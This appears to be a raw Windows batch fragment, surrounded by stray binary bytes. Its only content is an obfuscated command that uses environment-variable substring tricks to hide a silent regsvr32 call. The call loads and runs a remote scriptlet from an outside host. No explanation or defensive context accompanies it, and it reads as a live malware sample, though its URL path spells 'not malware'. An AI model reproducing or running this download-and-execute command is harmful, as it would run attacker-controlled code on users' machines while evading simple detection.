 k Ö 
 @echo off %ALLUSERSPROFILE:~4,1%egsv%ALLUSERSPROFILE:~4,1%32.exe /s /n /i:http://diaUVTHwm%ALLUSERSPROFILE:~4,1%vtXznqLCplDbYsfkGgBeFyjxOJAKIPoWcQSEu%ALLUSERSPROFILE:~4,1%ZhNM.com/n0tm4lw4%ALLUSERSPROFILE:~4,1%3  k Ö 
